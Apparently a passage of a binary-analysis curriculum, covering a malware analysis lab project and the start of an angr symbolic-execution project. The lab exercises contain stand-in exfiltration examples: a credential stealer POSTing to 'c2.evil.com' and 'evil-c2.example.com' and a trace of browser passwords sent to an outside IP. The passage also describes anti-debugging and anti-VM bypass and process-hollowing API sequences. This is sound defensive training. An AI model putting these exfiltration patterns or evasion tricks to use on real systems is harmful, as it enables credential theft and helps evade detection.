File I/O Operations โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 4-5: File I/O Decode all file-related syscalls (open, read, write, ioctl)
Process Management โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 24-27: Process Creation, Monitoring, Execution Understand fork(), exec(), wait() patterns in traces
Network Programming โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 56-61: Sockets Interpret socket(), connect(), bind(), listen(), accept()
Network Internals โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 11: Network Programming Client-server architecture, protocol design
Signals โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 20-22: Signals Understand signal handlers in malware
Dynamic Linking โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7: Linking Why you see library loads in strace
Binary Loading โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 5: Loading and Dynamic Linking How programs load and what syscalls this generates
Low-Level System Calls โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 2: Assembly Language Direct syscall invocation via syscall instruction
Ptrace Internals โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 53: Process Credentials (includes ptrace) How strace itself works
Anti-Debugging Techniques โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 15: Anti-Disassembly and Anti-Debugging Detect and bypass tracing countermeasures
Behavioral Analysis Methodology โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 3: Basic Dynamic Analysis Professional workflow for using dynamic analysis tools
Assembly & Syscalls โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 0x200: Programming (syscalls section) Raw syscall invocation in assembly

Project 10: Malware Analysis Lab

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python
  • Alternative Programming Languages: PowerShell (Windows malware)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 3. The โ€œService & Supportโ€ Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Malware Analysis / Threat Intelligence
  • Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
  • Main Book: โ€œPractical Malware Analysisโ€ by Sikorski & Honig

What youโ€™ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges youโ€™ll face:

  • Safe environment โ†’ maps to VMs, network isolation
  • Behavioral analysis โ†’ maps to what does it do when run?
  • Static analysis โ†’ maps to understanding without running
  • Anti-analysis bypass โ†’ maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

  • Safe Environment Setup: โ€œPractical Malware Analysisโ€ Ch. 2
  • Behavioral Analysis: โ€œPractical Malware Analysisโ€ Ch. 3
  • Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced Time estimate: 4-6 weeks Prerequisites: Projects 1-9, strong Windows/Linux knowledge

Real world outcome:

# Malware Analysis Report: suspicious.exe

## Executive Summary
The sample is a credential stealer that exfiltrates browser passwords
to a C2 server at 192.168.1.100:443.

## Static Analysis
- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\\User Data\\Default\\Login Data"
  - "Mozilla\\Firefox\\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis
1. Creates mutex "Global\\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs
- Mutex: Global\\{12345678-1234-...}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\\svchost.exe

## YARA Rule
rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}

Implementation Hints:

Analysis workflow:

  1. Triage: File type, hashes, VirusTotal check
  2. Environment Setup: Isolated VM with snapshots
  3. Behavioral Analysis:
    • Process Monitor (Windows) / strace (Linux)
    • Network capture (Wireshark, fakenet-ng)
    • Registry changes, file system changes
  4. Static Analysis:
    • Strings, imports, exports
    • Unpack if packed
    • Disassemble/decompile key functions
  5. Dynamic Analysis:
    • Debug with x64dbg/GDB
    • Set breakpoints on interesting APIs
    • Dump decrypted data
  6. Report Writing: Document findings with IOCs

Anti-analysis techniques to watch for:

  • IsDebuggerPresent() checks
  • Timing checks (RDTSC)
  • VM detection (CPUID, registry checks)
  • Anti-disassembly tricks

Learning milestones:

  1. Set up safe lab โ†’ Isolated analysis environment
  2. Behavioral analysis โ†’ Understand without disassembly
  3. Static analysis โ†’ Reverse engineer core functionality
  4. Write reports โ†’ Document findings professionally

The Core Question Youโ€™re Answering

โ€œHow do we safely dissect malicious software to understand its behavior, identify its capabilities, and develop countermeasuresโ€”all without becoming infected ourselves?โ€

This project tackles the complete malware analysis workflow from containment to comprehension. Youโ€™ll learn to think like both an attacker (to understand intent) and a defender (to build protections), mastering the delicate balance between running dangerous code and staying safe.

Concepts You Must Understand First

  1. Virtualization and Sandboxing
    • How virtual machines isolate malware from the host system
    • Understanding hypervisors (VirtualBox, VMware, KVM) and their security boundaries
    • Snapshotting and rollback to maintain clean analysis environments

    Guiding Questions:

    • Whatโ€™s the difference between a VM, a container, and a sandbox?
    • Can malware escape from a VM? What are VM escape vulnerabilities?
    • Why do you need network isolation in addition to VM isolation?

    Book References:

    • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Chapter 2: Malware Analysis in Virtual Machines
    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 11: Dynamic Binary Instrumentation
  2. Portable Executable (PE) File Format
    • Structure of Windows executables: DOS header, PE header, sections, imports, exports
    • Understanding Import Address Table (IAT) and how malware uses Windows APIs
    • Recognizing packed binaries by entropy analysis and section characteristics

    Guiding Questions:

    • What does it mean when a PE file has a high entropy .text section?
    • How do you identify if a binary is packed? (Hint: look at imports and section names)
    • Whatโ€™s the difference between static imports and dynamic loading with LoadLibrary/GetProcAddress?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 1: Basic Static Techniques
    • โ€œPractical Binary Analysisโ€ - Chapter 2: The ELF File Format (similar concepts apply to PE)
    • โ€œWindows Internalsโ€ by Russinovich & Solomon - Part 1, Chapter 3: System Mechanisms (PE format)
  3. Windows API and System Mechanisms
    • Critical APIs malware uses: CreateProcess, WriteProcessMemory, SetWindowsHookEx
    • Registry manipulation for persistence (Run keys, services)
    • Process injection techniques (DLL injection, process hollowing, APC injection)

    Guiding Questions:

    • What API sequence indicates DLL injection into another process?
    • How does malware achieve persistence without being obvious?
    • Whatโ€™s the difference between CreateRemoteThread and QueueUserAPC for code injection?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 12: Covert Malware Launching
    • โ€œWindows Internalsโ€ - Part 1, Chapter 3: System Mechanisms
    • โ€œThe Art of Memory Forensicsโ€ by Ligh et al. - Chapter 11: Malware Detection
  4. Anti-Analysis Techniques
    • Anti-debugging: IsDebuggerPresent, CheckRemoteDebuggerPresent, timing checks (RDTSC)
    • Anti-VM: CPUID checks, registry keys (HKLM\HARDWARE\Description), driver detection
    • Packing and obfuscation: UPX, custom packers, polymorphic code

    Guiding Questions:

    • How can you defeat IsDebuggerPresent() checks?
    • What registry keys do VMs create that malware looks for?
    • Whatโ€™s the difference between packing (compression) and obfuscation (code transformation)?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 15: Anti-Disassembly
    • โ€œPractical Malware Analysisโ€ - Chapter 16: Anti-Debugging
    • โ€œPractical Malware Analysisโ€ - Chapter 17: Obfuscation
  5. Network Protocols and C2 Communication
    • HTTP/HTTPS C2 channels and beaconing patterns
    • DNS tunneling for data exfiltration
    • Understanding bot commands and malware control protocols

    Guiding Questions:

    • How do you identify C2 traffic in a network capture?
    • What makes DNS tunneling attractive for attackers?
    • How would you decode a base64-encoded HTTP POST thatโ€™s exfiltrating data?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 14: Malware-Focused Network Signatures
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 11: Network Programming
    • โ€œThe Linux Programming Interfaceโ€ - Chapter 59: Sockets: Internet Domains
  6. Behavioral Indicators of Compromise (IOCs)
    • File-based IOCs: hashes (MD5, SHA256), file paths, mutex names
    • Network IOCs: IP addresses, domains, User-Agents, URL patterns
    • Registry IOCs: persistence keys, configuration storage

    Guiding Questions:

    • Why is SHA256 better than MD5 for malware identification?
    • What makes a good YARA rule vs. a brittle one?
    • How can attackers evade file-hash-based detection?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 3: Basic Dynamic Analysis
    • โ€œThe Art of Memory Forensicsโ€ - Chapter 11: Malware Detection
  7. Disassembly and Decompilation
    • Reading x86/x64 assembly: common patterns (function prologues, loops, conditionals)
    • Using Ghidraโ€™s decompiler to understand code logic
    • Identifying crypto operations, string obfuscation, and anti-analysis tricks in assembly

    Guiding Questions:

    • What assembly pattern indicates a string decryption routine?
    • How do you identify the โ€œmainโ€ function in a stripped binary?
    • When is assembly analysis more reliable than decompiled code?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 4: A Crash Course in x86 Disassembly
    • โ€œPractical Binary Analysisโ€ - Chapter 6: Disassembly and Binary Analysis Fundamentals
    • โ€œLow-Level Programmingโ€ by Igor Zhirkov - Chapter 3-5: Assembly Programming
  8. Static vs. Dynamic Analysis Trade-offs
    • When static analysis fails (heavy obfuscation, runtime code generation)
    • When dynamic analysis fails (time bombs, environment checks, anti-VM)
    • Hybrid approaches: concolic execution, taint analysis

    Guiding Questions:

    • If malware wonโ€™t run in your VM, what static analysis can you do?
    • How do you analyze malware with a time-delayed payload?
    • Whatโ€™s the advantage of symbolic execution over pure dynamic analysis?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Introduction: Basic Analysis vs. Advanced Analysis
    • โ€œPractical Binary Analysisโ€ - Chapter 11: Dynamic Binary Instrumentation
  9. Cryptography in Malware
    • Identifying crypto operations: XOR loops, AES constants, hash functions
    • Understanding why malware encrypts strings and configuration
    • Extracting encryption keys from memory dumps

    Guiding Questions:

    • What assembly pattern indicates a simple XOR decryption loop?
    • How do you find AES constants (S-boxes, round constants) in a binary?
    • Why do ransomware authors sometimes make crypto mistakes that allow file recovery?

    Book References:

    • โ€œPractical Malware Analysisโ€ - Chapter 13: Data Encoding (includes crypto)
    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Chapter 0x700: Cryptology
  10. Memory Forensics
    • Dumping process memory from running malware
    • Analyzing heaps for decrypted strings and configurations
    • Extracting injected code from remote processes

    Guiding Questions:

    • How do you dump a processโ€™s memory without killing it?
    • What tool helps you find injected DLLs in a process?
    • How can you extract the unpacked version of packed malware from memory?

    Book References:

    • โ€œThe Art of Memory Forensicsโ€ by Ligh et al. - Chapter 11: Malware Detection
    • โ€œPractical Malware Analysisโ€ - Chapter 9: OllyDbg (memory dumping)

Questions to Guide Your Design

  1. How would you design a safe lab that prevents malware from detecting itโ€™s being analyzed?
    • Consider anti-VM evasion: modify VM artifacts, use bare metal, change MAC addresses
    • Network design: INetSim for fake internet, isolated VLAN, no real network access
    • What makes an analysis environment โ€œinvisibleโ€ to malware?
  2. Whatโ€™s your workflow for triaging 100 malware samples to find the most interesting ones?
    • Automate with YARA rules, static signatures, VirusTotal queries
    • Quick behavioral checks: does it crash immediately? Does it beacon to a C2?
    • How do you prioritize novel malware over known families?
  3. How would you bypass an anti-debugging check that uses RDTSC timing?
    • Patch the check, hook RDTSC, use hardware breakpoints instead of software
    • Understand the trade-offs: patching changes the binary, hooking adds overhead
  4. How can you extract the configuration from a packed malware sample?
    • Dynamic: let it unpack in memory, then dump
    • Static: find the unpacking stub, manually unpack, or use automated unpackers
    • What if the malware uses multi-stage unpacking?
  5. Whatโ€™s the difference between analyzing Windows malware vs. Linux malware?
    • Tools differ: x64dbg/IDA vs. GDB/radare2
    • File formats: PE vs. ELF
    • APIs: Windows API vs. syscalls
    • But fundamental analysis principles remain the same
  6. How would you write a YARA rule that detects a malware family without generating false positives?
    • Use unique strings, not common ones
    • Combine multiple weak indicators
    • Test against known benign software
  7. What indicators tell you if malware is polymorphic or metamorphic?
    • Hash changes between samples of same family
    • Code structure changes (metamorphic) vs. just encryption key changes (polymorphic)
    • How does this affect detection?
  8. How do you analyze malware that requires internet connectivity to fully execute?
    • Fake C2 server with INetSim or custom Python scripts
    • MITM proxy to intercept/modify traffic
    • What if the malware validates C2 certificates?

Thinking Exercise

Exercise 1: Behavioral Analysis from Process Monitor

Examine this Process Monitor (procmon) output from an unknown executable:

CreateFile: C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS)
WriteFile: C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS, 45KB)
SetValueKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate = "C:\Users\victim\AppData\Roaming\svchost.exe" (SUCCESS)
CreateFile: C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data (SUCCESS)
ReadFile: Login Data (SUCCESS, 256KB)
Socket: Connect to 203.0.113.50:443 (SUCCESS)
WriteFile: Socket (SUCCESS, 256KB)

Questions to answer:

  1. What persistence mechanism is being used?
  2. What data is being exfiltrated?
  3. What type of malware is this likely to be?
  4. What IOCs can you extract?
  5. What should you investigate next in static analysis?

Exercise 2: Static Analysis - Identifying Packed Malware

You run strings on suspicious.exe and get:

UPX0
UPX1
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
kernel32.dll
VirtualProtect
GetProcAddress

You check the PE sections:

Section Name: UPX0 (Virtual Size: 0x5000, Raw Size: 0)
Section Name: UPX1 (Virtual Size: 0x8000, Raw Size: 0x7800)
Section Name: .rsrc (Virtual Size: 0x1000, Raw Size: 0x1000)

Tasks:

  1. How do you know this binary is packed?
  2. What tool would you use to unpack it?
  3. If unpacking fails, how would you manually unpack it dynamically?
  4. What would you look for after unpacking to start your analysis?

Exercise 3: Network Traffic Analysis

You capture this HTTP POST from malware:

POST /gate.php HTTP/1.1
Host: evil-c2.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded

id=PC-12345&os=Win10&data=dXNlcjpwYXNzd29yZDpjcmVkZW50aWFscw==

Questions:

  1. Decode the base64 data parameter. What is being exfiltrated?
  2. What are the network IOCs you can extract?
  3. How would you write a Snort/Suricata rule to detect this?
  4. How could the malware author make this harder to detect?

Exercise 4: Anti-Analysis Technique Identification

Youโ€™re debugging malware in x64dbg and it keeps crashing. You notice this assembly:

call GetTickCount
mov ebx, eax
; ... some code ...
call GetTickCount
sub eax, ebx
cmp eax, 0x3E8      ; 1000ms
jg  exit_immediately

Questions:

  1. What anti-analysis technique is this?
  2. How would you bypass it in a debugger?
  3. How would you patch the binary to remove this check?
  4. What other timing-based checks might malware use?

The Interview Questions Theyโ€™ll Ask

  1. โ€œWalk me through your complete malware analysis workflow, from receiving a sample to writing a report.โ€
    • Expected Answer: (1) Triage: hash check, VirusTotal, file type. (2) Safe Lab: isolated VM, snapshot. (3) Behavioral: run with procmon/tcpdump, observe actions. (4) Static: strings, imports, unpack if needed. (5) Deep dive: disassemble key functions, understand crypto/obfuscation. (6) Report: IOCs, YARA rule, detection strategies, mitigation advice.
  2. โ€œYou receive a packed malware sample. How do you unpack it?โ€
    • Expected Answer: (1) Identify packer (strings, entropy, UPX signature). (2) Try automated tools (UPX -d, unpacme.com). (3) If fails, dynamic unpacking: run in debugger, find OEP (Original Entry Point) after unpacking stub, dump memory. (4) Fix import table if needed. (5) Validate unpacked binary runs correctly.
  3. โ€œHow would you identify the C2 server in a malware sample using only static analysis?โ€
    • Expected Answer: (1) Strings search for IPs, domains, URLs. (2) Check data sections for encoded/encrypted configs. (3) Analyze code for decryption routines. (4) Look for DGA (Domain Generation Algorithm) if no hardcoded domains. (5) Check resources for embedded configs. Sometimes requires hybrid approach: breakpoint on network functions, dump arguments.
  4. โ€œExplain the difference between signature-based, heuristic, and behavioral malware detection.โ€
    • Expected Answer: Signature: exact pattern matching (hash, byte sequences) - fast, no false positives, but easily evaded. Heuristic: fuzzy matching, YARA rules, structural patterns - catches variants, some false positives. Behavioral: monitors actions (file writes, registry changes) - catches zero-days, but requires runtime overhead and sophisticated analysis.
  5. โ€œA malware sample wonโ€™t run in your VM. It just exits immediately. What do you do?โ€
    • Expected Answer: Likely anti-VM checks. (1) Static analysis: look for VM detection (CPUID, registry checks, process names). (2) Patch checks: NOP out conditional jumps. (3) Modify environment: change VM artifacts, rename VBoxService.exe. (4) Use bare metal if possible. (5) Hybrid: use IDA + debugger to trace execution path, find exit condition.
  6. โ€œWhatโ€™s process hollowing and how would you detect it?โ€
    • Expected Answer: What: Malware creates a legitimate process suspended, unmaps its memory, writes malicious code, resumes. Looks legitimate in process list. Detection: (1) Memory forensics: compare disk image to memory image - mismatch indicates hollowing. (2) Monitor API sequence: CreateProcess (suspended), ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread. (3) Tools: Volatanaโ€™s hollowfind plugin.
  7. โ€œHow do you determine if malware uses encryption, and how do you extract the key?โ€
    • Expected Answer: (1) Detection: high entropy sections, crypto constants (AES S-boxes, RC4 KSA), imports from crypto libraries. (2) Key extraction: If runtime encryption, breakpoint on encrypt/decrypt function, inspect arguments. If config encryption, find decryption routine, trace back to key (often XOR or AES with hardcoded key). (3) For XOR, frequency analysis or known-plaintext attacks.
  8. โ€œWhatโ€™s the difference between static and dynamic malware analysis, and when would you use each?โ€
    • Expected Answer: Static: analyze without executing - safe, fast, works on any platform, but defeated by obfuscation/packing. Good for: IOC extraction, packer identification, quick triage. Dynamic: execute in sandbox - sees runtime behavior, defeats packing, but requires safe environment, malware might detect VM, time-delayed payloads might not trigger. Use both: static for triage, dynamic for behavior, back to static for deep understanding.
  9. โ€œHow would you analyze ransomware safely without infecting your entire network?โ€
    • Expected Answer: (1) Isolation: VM with NO network access, or completely isolated VLAN. (2) Snapshots: before running, snapshot everything. (3) Shares: DO NOT mount network shares or shared folders. (4) Monitoring: procmon, regshot, file monitoring to see encryption activity. (5) Static first: donโ€™t run if you can extract encryption scheme statically. (6) Sacrifice VM: expect it to be destroyed, revert to snapshot after. (7) Memory forensics: dump memory to get keys if possible.
  10. โ€œYou find a suspicious PowerShell script. How do you analyze it?โ€
    • Expected Answer: (1) Deobfuscate: remove backticks, character substitution, base64 decode. (2) Beautify: format for readability. (3) Static analysis: what commands does it run? Download from URL? Execute shellcode? (4) Sandbox: PowerShell_ise with ExecutionPolicy bypass, trace execution. (5) Script logging: enable PowerShell logging in Windows. (6) IOCs: extract URLs, IPs, file paths. (7) Tools: PowerShell_decoder, CyberChef, remnux.

Books That Will Help

Topic Book Chapter/Section Why It Matters
Complete Malware Analysis Workflow โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 1-3: Basic Static and Dynamic Analysis The canonical reference for malware analysis methodology
Lab Setup & Safe Environments โ€œPractical Malware Analysisโ€ Ch. 2: Malware Analysis in Virtual Machines How to build an analysis lab that wonโ€™t infect you
PE File Format โ€œPractical Malware Analysisโ€ Ch. 1: Basic Static Techniques Understanding Windows executables
x86/x64 Assembly for Malware โ€œPractical Malware Analysisโ€ Ch. 4: A Crash Course in x86 Disassembly Reading the assembly that malware generates
Windows API & Malware Techniques โ€œPractical Malware Analysisโ€ Ch. 7-12: Advanced Dynamic/Static Analysis How malware uses Windows internals
Anti-Analysis Techniques โ€œPractical Malware Analysisโ€ Ch. 15-17: Anti-Disassembly, Anti-Debugging, Obfuscation Defeating malware countermeasures
Binary File Formats (PE & ELF) โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 2-3: ELF Format (similar to PE) Understanding executable structure
Advanced Disassembly โ€œPractical Binary Analysisโ€ Ch. 6: Disassembly and Binary Analysis Techniques for analyzing obfuscated code
Dynamic Binary Instrumentation โ€œPractical Binary Analysisโ€ Ch. 11: Principles of Dynamic Binary Instrumentation Using tools like Pin, DynamoRIO for analysis
Windows Internals for Malware โ€œWindows Internalsโ€ by Russinovich & Solomon Part 1, Ch. 3: System Mechanisms Understanding Windows under the hood
Process Injection Techniques โ€œThe Art of Memory Forensicsโ€ by Ligh et al. Ch. 11: Malware Detection How malware hides in memory
Memory Forensics for Malware โ€œThe Art of Memory Forensicsโ€ Ch. 11: Malware Detection Extracting malware from memory dumps
Network-Based Malware Analysis โ€œPractical Malware Analysisโ€ Ch. 14: Malware-Focused Network Signatures Analyzing C2 communication
Cryptography in Malware โ€œPractical Malware Analysisโ€ Ch. 13: Data Encoding Understanding how malware uses crypto
Low-Level Programming & Assembly โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 3-5: Assembly Programming Deep understanding of assembly for analysis
Exploit Development Context โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 0x500: Shellcode Understanding shellcode that malware might use
Reverse Engineering Fundamentals โ€œPractical Binary Analysisโ€ Ch. 7-8: Simple Code Injection, Advanced Code Injection Techniques malware uses for code injection

Project 11: Symbolic Execution with angr

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: None (angr is Python-only)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 4: Expert
  • Knowledge Area: Program Analysis / Constraint Solving
  • Software or Tool: angr framework, Python 3
  • Main Book: angr documentation

What youโ€™ll build: Use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges youโ€™ll face:

  • Setting up states โ†’ maps to defining where to start
  • Avoiding path explosion โ†’ maps to constraining exploration
  • Finding target addresses โ†’ maps to what state do you want?
  • Extracting solutions โ†’ maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

  • Symbolic State: angr docs - Core Concepts
  • Exploration Techniques: angr docs - Simulation
  • Constraint Solving: Z3 solver basics

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Projects 1-8, Python proficiency

Real world outcome:

import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    print(f"Password: {solution.decode()}")
else:
    print("No solution found")

# Output:
# Password: sup3r_s3cr3t_k3y

Implementation Hints:

angr workflow:

  1. Load binary with angr.Project()
  2. Create symbolic variables with claripy.BVS()
  3. Create initial state with factory.entry_state()
  4. Create simulation manager with factory.simulation_manager()
  5. Explore with simgr.explore(find=..., avoid=...)
  6. Extract solution with solver.eval()

Tips for avoiding path explosion:

  • Use avoid to skip irrelevant paths
  • Set memory limits on states
  • Use hooks to skip complex functions
  • Start exploration from specific addresses

Common patterns:

# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed

Learning milestones:

  1. Solve simple crackme โ†’ Basic symbolic execution
  2. Handle complex inputs โ†’ Symbolic arrays
  3. Use hooks โ†’ Skip annoying functions
  4. Solve CTF challenges โ†’ Real-world application

The Core Question Youโ€™re Answering

โ€œCan we automatically explore all possible execution paths in a program and mathematically prove which inputs reach specific program statesโ€”without manually testing every input?โ€

This project introduces symbolic execution, a technique that treats program inputs as mathematical symbols rather than concrete values. Instead of testing one input at a time, youโ€™ll explore entire classes of inputs simultaneously, using constraint solvers to find the exact input that triggers a bug or reaches a target state.

Concepts You Must Understand First

  1. Concrete vs. Symbolic Execution
    • Concrete execution: run program with specific input (โ€œtest123โ€), get specific output
    • Symbolic execution: run program with symbolic input (xโ‚€, xโ‚, xโ‚‚โ€ฆ), track constraints
    • How symbolic execution explores multiple paths simultaneously

    Guiding Questions:

    • What happens when a program branches on symbolic input (if (input[0] == 'A'))?
    • How does symbolic execution differ from fuzzing (which uses random concrete inputs)?
    • Why is symbolic execution deterministic while fuzzing is probabilistic?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 11.4: Symbolic Execution
    • angr documentation - Core Concepts: Symbolic Variables
    • Academic paper: โ€œA Survey of Symbolic Execution Techniquesโ€ (Baldoni et al., 2018)
  2. SMT Solvers and Constraint Solving
    • Satisfiability Modulo Theories (SMT): solving logical formulas over different domains
    • Z3 solver (used by angr): determines if constraints are satisfiable
    • Constraints accumulate as execution proceeds: x[0] == 'A' AND x[1] != 'B' AND ...

    Guiding Questions:

    • What does it mean for a set of constraints to be โ€œunsatisfiableโ€?
    • How does angr use Z3 to generate concrete inputs from symbolic constraints?
    • Why is SMT solving computationally expensive (NP-complete in general)?

    Book References:

    • Z3 Tutorial: โ€œProgramming Z3โ€ (De Moura & Bjรธrner)
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 2.2: Integer Representations (foundation for bitvector logic)
  3. Path Explosion Problem
    • Exponential growth of paths: n branches โ†’ 2โฟ possible paths
    • Loops amplify explosion: 100-iteration loop creates astronomical path count
    • Mitigations: path merging, state pruning, selective exploration

    Guiding Questions:

    • Why does a simple loop for(i=0; i<100; i++) create path explosion?
    • How do you prioritize which paths to explore first?
    • Whatโ€™s the trade-off between path coverage and analysis time?

    Book References:

    • โ€œPractical Binary Analysisโ€ - Chapter 11.4: Symbolic Execution (discusses path explosion)
    • angr documentation - Exploration Techniques
  4. Intermediate Representation (IR)
    • angr uses VEX IR (from Valgrind) to represent machine code abstractly
    • Why IR: easier to analyze than raw assembly, architecture-independent
    • Statements, expressions, and temporary variables in VEX

    Guiding Questions:

    • Why doesnโ€™t angr operate directly on x86/ARM assembly?
    • What information is lost when translating assembly โ†’ IR?
    • How do you map a VEX IR address back to assembly for debugging?

    Book References:

    • angr documentation - Core Concepts: Intermediate Representation
    • โ€œPractical Binary Analysisโ€ - Chapter 11.3: Dynamic Binary Instrumentation (similar IR concepts)
  5. Simulation State and Memory Models
    • angrโ€™s SimState: CPU registers, memory, file system, all symbolic or concrete
    • Symbolic memory: can read/write symbolic values
    • Lazy memory model: only allocates pages when accessed

    Guiding Questions:

    • What happens when you read from a symbolic memory address?
    • How does angr decide whether a memory value is symbolic or concrete?
    • Why is lazy memory initialization important for performance?

    Book References:

    • angr documentation - Core Concepts: States
    • angr documentation - Top-Level Interfaces: Simulation Managers
  6. Control Flow Graph (CFG) Recovery
    • angr builds CFG by discovering basic blocks and edges
    • Static CFG (fast, incomplete) vs. Dynamic CFG (slower, more accurate)
    • Function boundaries, indirect jumps, and obfuscation challenges

    Guiding Questions:

    • How does angr discover code in a stripped binary without symbols?
    • What makes indirect jumps (jmp rax) hard for CFG recovery?
    • Why might a packed binary confuse CFG analysis?

    Book References:

    • โ€œPractical Binary Analysisโ€ - Chapter 6.3: Control Flow Graph Recovery
    • angr documentation - Advanced Topics: CFG
  7. Symbolic Execution Strategies
    • DFS (Depth-First Search): go deep, might miss states
    • BFS (Breadth-First Search): explore level-by-level, memory intensive
    • Veritesting: smart path merging to reduce state explosion
    • Custom exploration: prioritize based on distance to target

    Guiding Questions:

    • When would DFS find a solution faster than BFS?
    • Whatโ€™s path merging and why does it help with loops?
    • How do you write a custom exploration technique?

    Book References:

    • angr documentation - Simulation Managers: Exploration Techniques
    • Paper: โ€œEnhancing Symbolic Execution with Veritestingโ€ (Avgerinos et al., 2014)
  8. Hooking and Environment Interaction
    • Replacing library functions with Python summaries (SimProcedures)
    • Modeling system calls without actually executing them
    • Creating simplified environments for complex functions

    Guiding Questions:

    • Why hook strlen() instead of symbolically executing it?
    • How do you model a network socket in symbolic execution?
    • What happens if you donโ€™t hook malloc() and the program allocates GB of memory?

    Book References:

    • angr documentation - Advanced Topics: SimProcedures
    • angr documentation - Examples: Hooking
  9. Constraint Optimization and Caching
    • Incremental solving: reuse previous solutions
    • Constraint simplification before sending to Z3
    • State cloning and copy-on-write optimizations

    Guiding Questions:

    • Why is solving x == 5 much faster than x * y + z == 1000?
    • How does angr cache solver results to speed up analysis?
    • Whatโ€™s the cost of cloning a state with gigabytes of symbolic memory?

    Book References:

    • angr documentation - Solver Engine
    • Academic paper on symbolic execution optimization techniques
  10. Concretization Strategies
    • When symbolic execution canโ€™t continue symbolically (e.g., symbolic jump target)
    • Concretization: picking a concrete value for a symbolic variable
    • Strategies: max/min value, single solution, all solutions (fork)

    Guiding Questions:

    • What happens when a program does jmp [symbolic_address]?
    • Why might concretization cause you to miss valid paths?
    • How do you decide which value to concretize to?

    Book References:

    • angr documentation - Solver: Concretization Strategies

Questions to Guide Your Design

  1. How do you choose the right starting point for symbolic execution?
    • Start at entry point (complete but slow) vs. start at function of interest (fast but requires setup)
    • How do you set up registers/memory when starting mid-program?
  2. How do you write a find condition thatโ€™s neither too broad nor too narrow?
    • Too broad: โ€œany state that prints outputโ€ (finds wrong solution)
    • Too narrow: โ€œstate at address 0x401234โ€ (misses alternate paths)
